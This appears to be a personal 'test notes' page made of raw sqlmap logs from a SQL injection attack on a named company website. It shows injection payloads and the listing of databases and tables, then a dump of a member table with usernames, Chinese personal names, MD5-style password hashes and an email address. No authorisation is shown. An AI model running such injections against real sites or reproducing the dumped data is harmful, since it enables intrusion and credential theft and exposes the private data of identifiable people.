神州数码测试笔记

  • 内容
  • 相关
http://www.digitalchina.com.hk/c/about_mgt_details.php?id=12097
http://www.digitalchina.com.hk/html/about_mgt_details.php?id=12097

sql注入地址两洞.

-----------------------------------------------------------------------------------------


root@root:~# sqlmap -u http://www.digitalchina.com.hk/c/about_mgt_details.php?id=12097 --dbs

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 20:41:56

[20:41:56] [INFO] resuming back-end DBMS 'mysql' 
[20:41:56] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=12097' AND 2856=2856 AND 'LlJN'='LlJN

    Type: UNION query
    Title: MySQL UNION query (NULL) - 22 columns
    Payload: id=12097' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716f637271,0x686e6a416d624e6b6b58,0x7177797771),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=12097' AND SLEEP(5) AND 'dZFr'='dZFr
---
[20:41:57] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.3
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[20:41:57] [INFO] fetching database names
[20:41:57] [WARNING] reflective value(s) found and filtering out
[20:41:57] [WARNING] something went wrong with full UNION technique (most probably because of limitation on retrieved number of entries). Falling back to partial UNION technique
[20:41:58] [WARNING] the SQL query provided does not return any output
[20:41:58] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[20:41:58] [INFO] fetching number of databases
[20:41:58] [INFO] resumed: 12
[20:41:58] [INFO] resumed: information_schema
[20:41:58] [INFO] resumed: bboard2_delete
[20:41:58] [INFO] resumed: kotocms003
[20:41:58] [INFO] resumed: mysql
[20:41:58] [INFO] resumed: performance_schema
[20:41:58] [INFO] resumed: test
[20:41:58] [INFO] resumed: tomocms2
[20:41:58] [INFO] resumed: tomocms2_center
[20:41:58] [INFO] resumed: tomocms2_cn
[20:41:58] [INFO] resumed: tomocms2_sg
[20:41:58] [INFO] resumed: tomocms2_tw
[20:41:58] [INFO] resumed: xinhuapinmei
available databases [12]:
[*] bboard2_delete
[*] information_schema
[*] kotocms003
[*] mysql
[*] performance_schema
[*] test
[*] tomocms2
[*] tomocms2_center
[*] tomocms2_cn
[*] tomocms2_sg
[*] tomocms2_tw
[*] xinhuapinmei

[20:41:58] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.digitalchina.com.hk'

[*] shutting down at 20:41:58

root@root:~# 


root@root:~# sqlmap -u http://www.digitalchina.com.hk/c/about_mgt_details.php?id=12097 --tables -D kotocms003

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 20:17:20

[20:17:21] [INFO] resuming back-end DBMS 'mysql' 
[20:17:21] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=12097' AND 2856=2856 AND 'LlJN'='LlJN

    Type: UNION query
    Title: MySQL UNION query (NULL) - 22 columns
    Payload: id=12097' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716f637271,0x686e6a416d624e6b6b58,0x7177797771),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=12097' AND SLEEP(5) AND 'dZFr'='dZFr
---
[20:17:21] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.3
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[20:17:21] [INFO] fetching tables for database: 'kotocms003'
[20:17:22] [WARNING] reflective value(s) found and filtering out
[20:17:22] [WARNING] something went wrong with full UNION technique (most probably because of limitation on retrieved number of entries). Falling back to partial UNION technique
[20:17:22] [WARNING] the SQL query provided does not return any output
[20:17:22] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[20:17:22] [INFO] fetching number of tables for database 'kotocms003'
[20:17:22] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:17:22] [INFO] retrieved: 56
[20:17:26] [INFO] retrieved: access_log
[20:18:00] [INFO] retrieved: addon02_custom
[20:18:42] [INFO] retrieved: addon02_data
[20:19:06] [INFO] retrieved: addon02_element
[20:19:34] [INFO] retrieved: addon02_element_index
[20:19:59] [INFO] retrieved: addon02_fo
[20:20:41] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
rm
[20:20:48] [INFO] retrieved: addon02_history
[20:21:13] [INFO] retrieved: addon02_index
[20:21:32] [INFO] retrieved: addon02_submenu
[20:21:54] [INFO] retrieved: addon02_trans
[20:22:15] [INFO] retrieved: addon03_submenu
[20:22:48] [INFO] retrieved: addon04_data
[20:23:11] [INFO] retrieved: addon04_submenu
[20:23:35] [INFO] retrieved: addon04_templa
[20:24:29] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
te
[20:24:38] [INFO] retrieved: authority_info
[20:25:16] [INFO] retrieved: contact_result
[20:26:01] [INFO] retrieved: core01_data
[20:26:43] [INFO] retrieved: core01_history
[20:27:08] [INFO] retrieved: core01_index
[20:27:29] [INFO] retrieved: core01_s12
[20:27:45] [INFO] retrieved: core01_s13
[20:27:56] [INFO] retrieved: core01_s19
[20:28:04] [INFO] retrieved: core01_s20
[20:28:16] [INFO] retrieved: core01_s21
[20:28:25] [INFO] retrieved: core01_s6
[20:28:33] [INFO] retrieved: core01_s7
[20:28:41] [INFO] retrieved: core01_submenu
[20:29:09] [INFO] retrieved: core01_tr
[20:29:50] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
ans
[20:29:58] [INFO] retrieved: core02_data
[20:30:18] [INFO] retrieved: core02_history
[20:30:51] [INFO] retrieved: core02_index
[20:31:15] [INFO] retrieved: core02_submenu
[20:31:38] [INFO] retrieved: core02_trans
[20:32:00] [INFO] retrieved: core03_data
[20:32:25] [INFO] retrieved: core03
[20:32:58] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
_history
[20:33:21] [INFO] retrieved: core03_index
[20:33:41] [INFO] retrieved: core03_submenu
[20:34:17] [INFO] retrieved: core03_trans
[20:34:37] [INFO] retrieved: email_templ
[20:35:47] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
ate
[20:35:58] [INFO] retrieved: function01_cms_approve
[20:37:00] [INFO] retrieved: function01_cms_comment_history
[20:37:54] [INFO] retrieved: function01_cms_data
[20:38:18] [INFO] retrieved: function01_cms_field
[20:38:40] [INFO] retrieved: function01_cms_history
[20:39:13] [INFO] retrieved: function01_cms_index
[20:39:37] [INFO] retrieved: function01_cms_trans
[20:39:56] [INFO] retrieved: function01_cms_view
[20:40:15] [INFO] retrieved: function01_cms_view_history
[20:40:45] [INFO] retrieved: function01_cms_vote
[20:41:03] [INFO] retrieved: function01_cms_vote_history
[20:41:34] [INFO] retrieved: function01_submenu
[20:42:03] [INFO] retrieved: function02_mms_history
[20:42:47] [INFO] retrieved: function02_mms_log
[20:43:04] [INFO] retrieved: portal_index
[20:43:41] [INFO] retrieved: system01_preference
[20:44:36] [INFO] retrieved: system01_submenu
Database: kotocms003
[56 tables]
+--------------------------------+
| access_log                     |
| addon02_custom                 |
| addon02_data                   |
| addon02_element                |
| addon02_element_index          |
| addon02_form                   |
| addon02_history                |
| addon02_index                  |
| addon02_submenu                |
| addon02_trans                  |
| addon03_submenu                |
| addon04_data                   |
| addon04_submenu                |
| addon04_template               |
| authority_info                 |
| contact_result                 |
| core01_data                    |
| core01_history                 |
| core01_index                   |
| core01_s12                     |
| core01_s13                     |
| core01_s19                     |
| core01_s20                     |
| core01_s21                     |
| core01_s6                      |
| core01_s7                      |
| core01_submenu                 |
| core01_trans                   |
| core02_data                    |
| core02_history                 |
| core02_index                   |
| core02_submenu                 |
| core02_trans                   |
| core03_data                    |
| core03_history                 |
| core03_index                   |
| core03_submenu                 |
| core03_trans                   |
| email_template                 |
| function01_cms_approve         |
| function01_cms_comment_history |
| function01_cms_data            |
| function01_cms_field           |
| function01_cms_history         |
| function01_cms_index           |
| function01_cms_trans           |
| function01_cms_view            |
| function01_cms_view_history    |
| function01_cms_vote            |
| function01_cms_vote_history    |
| function01_submenu             |
| function02_mms_history         |
| function02_mms_log             |
| portal_index                   |
| system01_preference            |
| system01_submenu               |
+--------------------------------+

[20:45:02] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.digitalchina.com.hk'

[*] shutting down at 20:45:02




root@root:~# sqlmap -u http://www.digitalchina.com.hk/c/about_mgt_details.php?id=12097 --columns -T dede_member -D xinhuapinmei

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 20:49:27

[20:49:28] [INFO] resuming back-end DBMS 'mysql' 
[20:49:28] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=12097' AND 2856=2856 AND 'LlJN'='LlJN

    Type: UNION query
    Title: MySQL UNION query (NULL) - 22 columns
    Payload: id=12097' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716f637271,0x686e6a416d624e6b6b58,0x7177797771),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=12097' AND SLEEP(5) AND 'dZFr'='dZFr
---
[20:49:28] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.3
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[20:49:28] [INFO] fetching columns for table 'dede_member' in database 'xinhuapinmei'
[20:49:28] [WARNING] reflective value(s) found and filtering out
[20:49:28] [WARNING] something went wrong with full UNION technique (most probably because of limitation on retrieved number of entries). Falling back to partial UNION technique
[20:49:29] [WARNING] the SQL query provided does not return any output
[20:49:29] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[20:49:29] [WARNING] unable to retrieve column names for table 'dede_member' in database 'xinhuapinmei'
do you want to use common column existence check? [y/N/q] n
[20:49:30] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.digitalchina.com.hk'

[*] shutting down at 20:49:30

root@root:~# sqlmap -u http://www.digitalchina.com.hk/c/about_mgt_details.php?id=12097 --columns -T dede_member -D xinhuapinmei

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 20:49:50

[20:49:50] [INFO] resuming back-end DBMS 'mysql' 
[20:49:50] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=12097' AND 2856=2856 AND 'LlJN'='LlJN

    Type: UNION query
    Title: MySQL UNION query (NULL) - 22 columns
    Payload: id=12097' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716f637271,0x686e6a416d624e6b6b58,0x7177797771),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=12097' AND SLEEP(5) AND 'dZFr'='dZFr
---
[20:49:50] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.3
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[20:49:50] [INFO] fetching columns for table 'dede_member' in database 'xinhuapinmei'
[20:49:51] [WARNING] reflective value(s) found and filtering out
[20:49:51] [WARNING] something went wrong with full UNION technique (most probably because of limitation on retrieved number of entries). Falling back to partial UNION technique
[20:49:51] [WARNING] the SQL query provided does not return any output
[20:49:51] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[20:49:51] [WARNING] unable to retrieve column names for table 'dede_member' in database 'xinhuapinmei'
do you want to use common column existence check? [y/N/q] y
[20:49:53] [INFO] checking column existence using items from '/usr/share/sqlmap/txt/common-columns.txt'
[20:49:53] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 
[20:49:54] [WARNING] running in a single-thread mode. This could take a while.
[20:49:56] [INFO] retrieved: userid                                            
[20:50:00] [INFO] retrieved: email                                             
[20:50:25] [INFO] tried 73/2496 items (3%)
[20:50:56] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[20:51:21] [INFO] retrieved: mid                                               
[20:53:55] [INFO] tried 477/2496 items (19%)
[20:54:26] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[20:54:46] [INFO] retrieved: pwd                                               
[20:55:13] [INFO] retrieved: uname                                             
[21:00:17] [INFO] tried 1458/2496 items (58%)
[21:00:48] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[21:01:10] [INFO] tried 1519/2496 items (61%)^C

[21:01:10] [WARNING] user aborted during column existence check. sqlmap will display partial output
                                                                               
Database: xinhuapinmei
Table: dede_member
[5 columns]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| email  | non-numeric |
| mid    | numeric     |
| pwd    | non-numeric |
| uname  | non-numeric |
| userid | non-numeric |
+--------+-------------+

[21:01:14] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.digitalchina.com.hk'

[*] shutting down at 21:01:14

root@root:~#sqlmap -u http://www.digitalchina.com.hk/c/about_mgt_details.php?id=12097 --dump -T dede_member -C "email,uname,pwd" -D xinhuapinmei

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:01:47

[21:01:47] [INFO] resuming back-end DBMS 'mysql' 
[21:01:47] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=12097' AND 2856=2856 AND 'LlJN'='LlJN

    Type: UNION query
    Title: MySQL UNION query (NULL) - 22 columns
    Payload: id=12097' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716f637271,0x686e6a416d624e6b6b58,0x7177797771),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=12097' AND SLEEP(5) AND 'dZFr'='dZFr
---
[21:01:47] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.3
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[21:01:47] [INFO] fetching columns 'email, pwd, uname' for table 'dede_member' in database 'xinhuapinmei'
[21:01:48] [WARNING] reflective value(s) found and filtering out
[21:01:48] [WARNING] something went wrong with full UNION technique (most probably because of limitation on retrieved number of entries). Falling back to partial UNION technique
[21:01:48] [WARNING] the SQL query provided does not return any output
[21:01:48] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[21:01:48] [WARNING] unable to retrieve column names for table 'dede_member' in database 'xinhuapinmei'
[21:01:48] [INFO] fetching entries of column(s) 'email, mid, pwd, uname, userid' for table 'dede_member' in database 'xinhuapinmei'
[21:01:49] [WARNING] the SQL query provided does not return any output
[21:01:49] [INFO] fetching number of column(s) 'email, mid, pwd, uname, userid' entries for table 'dede_member' in database 'xinhuapinmei'
[21:01:49] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[21:01:49] [INFO] retrieved: 5
[21:01:52] [INFO] retrieved: 
[21:01:54] [WARNING] time-based comparison requires larger statistical model, please wait............
[21:01:59] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 

[21:02:02] [INFO] retrieved: 1
[21:02:08] [INFO] retrieved: a611731a28198c541f3c9f0f8a351173
[21:03:33] [INFO] retrieved: admin
[21:03:48] [INFO] retrieved: admin
[21:04:02] [INFO] retrieved: 
[21:04:04] [INFO] retrieved: 
[21:04:07] [INFO] retrieved: 2
[21:04:12] [INFO] retrieved: 479df66f8880a77d1077fe5056bf10ba
[21:05:36] [INFO] retrieved: 汤蕾
[21:06:59] [INFO] retrieved: tanglei
[21:07:18] [INFO] retrieved: 
[21:07:21] [INFO] retrieved: 
[21:07:23] [INFO] retrieved: 3
[21:07:28] [INFO] retrieved: 479df66f8880a77d1077fe5056bf10ba
[21:09:05] [INFO] retrieved: 
[21:10:07] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
钱晓乐
[21:11:33] [INFO] retrieved: qianxiaole
[21:12:07] [INFO] retrieved: 
[21:12:10] [INFO] retrieved: 
[21:12:14] [INFO] retrieved: 4
[21:12:20] [INFO] retrieved: 479df66f8880a77d1077f
[21:13:59] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
e5056bf10ba
[21:14:32] [INFO] retrieved: 
[21:15:34] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
刘惠迪
[21:17:02] [INFO] retrieved: liuhui
[21:17:51] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
di
[21:17:57] [INFO] retrieved: 
[21:18:29] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
liuyichi@gmail.com
[21:19:16] [INFO] retrieved: 5
[21:19:21] [INFO] retrieved: ee69dc27
[21:20:14] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
13e3c
[21:20:59] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
413414e38390930a5ca
[21:21:50] [INFO] retrieved: 张科
[21:23:04] [INFO] retrieved: zhangke
[21:23:25] [INFO] analyzing table dump for possible password hashes
[21:23:25] [INFO] recognized possible password hashes in column 'pwd'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: xinhuapinmei
Table: dede_member
[5 entries]
+-----+------------+----------------------------------+-------+--------------------+
| mid | userid     | pwd                              | uname | email              |
+-----+------------+----------------------------------+-------+--------------------+
| 1   | admin      | a611731a28198c541f3c9f0f8a351173 | admin | <blank>            |
| 2   | tanglei    | 479df66f8880a77d1077fe5056bf10ba | 汤蕾    | <blank>            |
| 3   | qianxiaole | 479df66f8880a77d1077fe5056bf10ba | 钱晓乐   | <blank>            |
| 4   | liuhuidi   | 479df66f8880a77d1077fe5056bf10ba | 刘惠迪   | <blank>            |
| 5   | zhangke    | ee69dc2713e3c413414e38390930a5ca | 张科    | liuyichi@gmail.com |
+-----+------------+----------------------------------+-------+--------------------+

[21:25:56] [INFO] table 'xinhuapinmei.dede_member' dumped to CSV file '/usr/share/sqlmap/output/www.digitalchina.com.hk/dump/xinhuapinmei/dede_member.csv'
[21:25:56] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.digitalchina.com.hk'

[*] shutting down at 21:25:56

root@root:~#  


root@root:~# sqlmap -u http://www.digitalchina.com.hk/c/about_mgt_details.php?id=12097 --tables -D xinhuapinmei

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 20:17:46

[20:17:47] [INFO] resuming back-end DBMS 'mysql' 
[20:17:49] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=12097' AND 2856=2856 AND 'LlJN'='LlJN

    Type: UNION query
    Title: MySQL UNION query (NULL) - 22 columns
    Payload: id=12097' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716f637271,0x686e6a416d624e6b6b58,0x7177797771),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=12097' AND SLEEP(5) AND 'dZFr'='dZFr
---
[20:17:49] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.3
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[20:17:49] [INFO] fetching tables for database: 'xinhuapinmei'
[20:17:50] [WARNING] reflective value(s) found and filtering out
[20:17:50] [WARNING] something went wrong with full UNION technique (most probably because of limitation on retrieved number of entries). Falling back to partial UNION technique
[20:17:50] [WARNING] the SQL query provided does not return any output
[20:17:50] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[20:17:50] [INFO] fetching number of tables for database 'xinhuapinmei'
[20:17:50] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:17:50] [INFO] retrieved: 86
[20:17:55] [INFO] retrieved: dede_addonarticle
[20:18:43] [INFO] retrieved: dede_addonimages
[20:19:04] [INFO] retrieved: dede_addoninfos
[20:19:24] [INFO] retrieved: dede_addonshop
[20:19:40] [INFO] retrieved: dede_addonsoft
[20:19:54] [INFO] retrieved: dede_addonspec
[20:20:11] [INFO] retrieved: dede_admin
[20:20:26] [INFO] retrieved: dede_admintype
[20:20:45] [INFO] retrieved: dede_ad
[20:21:19] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
vancedsearch
[20:22:01] [INFO] retrieved: dede_arcatt
[20:22:20] [INFO] retrieved: dede_arccache
[20:22:40] [INFO] retrieved: dede_archives
[20:22:58] [INFO] retrieved: dede_arcmulti
[20:23:17] [INFO] retrieved: dede_arcrank
[20:23:34] [INFO] retrieved: dede_arctiny
[20:23:50] [INFO] retrieved: dede_arctyp
[20:24:32] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
e
[20:24:39] [INFO] retrieved: dede_area
[20:24:50] [INFO] retrieved: dede_channeltype
[20:25:23] [INFO] retrieved: dede_co_htmls
[20:25:52] [INFO] retrieved: dede_co_mediaurls
[20:26:46] [INFO] retrieved: dede_co_note
[20:27:04] [INFO] retrieved: dede_co_onepage
[20:27:28] [INFO] retrieved: dede_co_urls
[20:27:44] [INFO] retrieved: dede_diyforms
[20:28:09] [INFO] retrieved: dede_dl_log
[20:28:28] [INFO] retrieved: dede_downloads
[20:28:55] [INFO] retrieved: ded
[20:29:27] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
e_erradd
[20:29:48] [INFO] retrieved: dede_feedback
[20:30:24] [INFO] retrieved: dede_flink
[20:30:42] [INFO] retrieved: dede_flinktype
[20:30:58] [INFO] retrieved: dede_freelist
[20:31:25] [INFO] retrieved: dede_homepagese
[20:32:28] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
t
[20:32:33] [INFO] retrieved: dede_keywords
[20:33:05] [INFO] retrieved: dede_log
[20:33:19] [INFO] retrieved: dede_member
[20:33:46] [INFO] retrieved: dede_member_company
[20:34:19] [INFO] retrieved: dede_member_f
[20:34:59] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
eed
[20:35:16] [INFO] retrieved: dede_member_fl
[20:35:59] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
ink
[20:36:12] [INFO] retrieved: dede_member_friends
[20:36:41] [INFO] retrieved: dede_member_group
[20:37:04] [INFO] retrieved: dede_member_guestbook
[20:37:36] [INFO] retrieved: dede_member_model
[20:38:00] [INFO] retrieved: dede_member_msg
[20:38:27] [INFO] retrieved: dede_member_op
[20:39:12] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
eration
[20:39:33] [INFO] retrieved: dede_member_person
[20:40:26] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request

[20:40:30] [INFO] retrieved: dede_member_pms
[20:40:42] [INFO] retrieved: dede_member_snsmsg
[20:41:05] [INFO] retrieved: dede_member_space
[20:41:26] [INFO] retrieved: dede_member_stow
[20:41:46] [INFO] retrieved: dede_member_stowtype
[20:42:06] [INFO] retrieved: dede_member_tj
[20:42:21] [INFO] retrieved: dede_member_type
[20:42:37] [INFO] retrieved: dede_member_vhistory
[20:43:13] [INFO] retrieved: dede_moneycard_record
[20:43:59] [INFO] retrieved: dede_moneycard_type
[20:44:21] [INFO] retrieved: dede_mtypes
[20:44:39] [INFO] retrieved: dede_multiserv_config
[20:45:23] [INFO] retrieved: dede_myad
[20:45:39] [INFO] retrieved: dede_mytag
[20:45:51] [INFO] retrieved: dede_payment
[20:46:13] [INFO] retrieved: dede_plus
[20:46:27] [INFO] retrieved: dede_purview
[20:46:51] [INFO] retrieved: 
[20:47:22] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
dede_pwd_tmp
[20:47:45] [INFO] retrieved: dede_ratings
[20:48:07] [INFO] retrieved: dede_scores
[20:48:31] [INFO] retrieved: dede_search_cache
[20:49:04] [INFO] retrieved: dede_search_keywords
[20:49:30] [INFO] retrieved: dede_sgpage
[20:49:50] [INFO] retrieved: dede_shops_delivery
[20:50:32] [INFO] retrieved: dede_shops_orders
[20:50:54] [INFO] retrieved: dede_shops_products
[20:51:37] [INFO] retrieved: dede_shops_userinfo
[20:52:10] [INFO] retrieved: dede_softconfig
[20:52:40] [INFO] retrieved: dede_sphinx
[20:52:59] [INFO] retrieved: dede_stepselect
[20:53:28] [INFO] retrieved: dede_sys_enum
[20:53:52] [INFO] retrieved: d
[20:54:23] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
ede_sys_module
[20:54:44] [INFO] retrieved: dede_sys_set
[20:55:00] [INFO] retrieved: dede_sys_task
[20:55:16] [INFO] retrieved: dede_sysconfig
[20:55:38] [INFO] retrieved: dede_tagindex
[20:56:00] [INFO] retrieved: dede_taglist
[20:56:16] [INFO] retrieved: dede_uploads
[20:56:37] [INFO] retrieved: dede_verifies
[20:57:04] [INFO] retrieved: dede_vote
[20:57:18] [INFO] retrieved: dede_vote_member
Database: xinhuapinmei
[86 tables]
+-----------------------+
| dede_addonarticle     |
| dede_addonimages      |
| dede_addoninfos       |
| dede_addonshop        |
| dede_addonsoft        |
| dede_addonspec        |
| dede_admin            |
| dede_admintype        |
| dede_advancedsearch   |
| dede_arcatt           |
| dede_arccache         |
| dede_archives         |
| dede_arcmulti         |
| dede_arcrank          |
| dede_arctiny          |
| dede_arctype          |
| dede_area             |
| dede_channeltype      |
| dede_co_htmls         |
| dede_co_mediaurls     |
| dede_co_note          |
| dede_co_onepage       |
| dede_co_urls          |
| dede_diyforms         |
| dede_dl_log           |
| dede_downloads        |
| dede_erradd           |
| dede_feedback         |
| dede_flink            |
| dede_flinktype        |
| dede_freelist         |
| dede_homepageset      |
| dede_keywords         |
| dede_log              |
| dede_member           |
| dede_member_company   |
| dede_member_feed      |
| dede_member_flink     |
| dede_member_friends   |
| dede_member_group     |
| dede_member_guestbook |
| dede_member_model     |
| dede_member_msg       |
| dede_member_operation |
| dede_member_person    |
| dede_member_pms       |
| dede_member_snsmsg    |
| dede_member_space     |
| dede_member_stow      |
| dede_member_stowtype  |
| dede_member_tj        |
| dede_member_type      |
| dede_member_vhistory  |
| dede_moneycard_record |
| dede_moneycard_type   |
| dede_mtypes           |
| dede_multiserv_config |
| dede_myad             |
| dede_mytag            |
| dede_payment          |
| dede_plus             |
| dede_purview          |
| dede_pwd_tmp          |
| dede_ratings          |
| dede_scores           |
| dede_search_cache     |
| dede_search_keywords  |
| dede_sgpage           |
| dede_shops_delivery   |
| dede_shops_orders     |
| dede_shops_products   |
| dede_shops_userinfo   |
| dede_softconfig       |
| dede_sphinx           |
| dede_stepselect       |
| dede_sys_enum         |
| dede_sys_module       |
| dede_sys_set          |
| dede_sys_task         |
| dede_sysconfig        |
| dede_tagindex         |
| dede_taglist          |
| dede_uploads          |
| dede_verifies         |
| dede_vote             |
| dede_vote_member      |
+-----------------------+

[20:57:45] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.digitalchina.com.hk'

[*] shutting down at 20:57:45

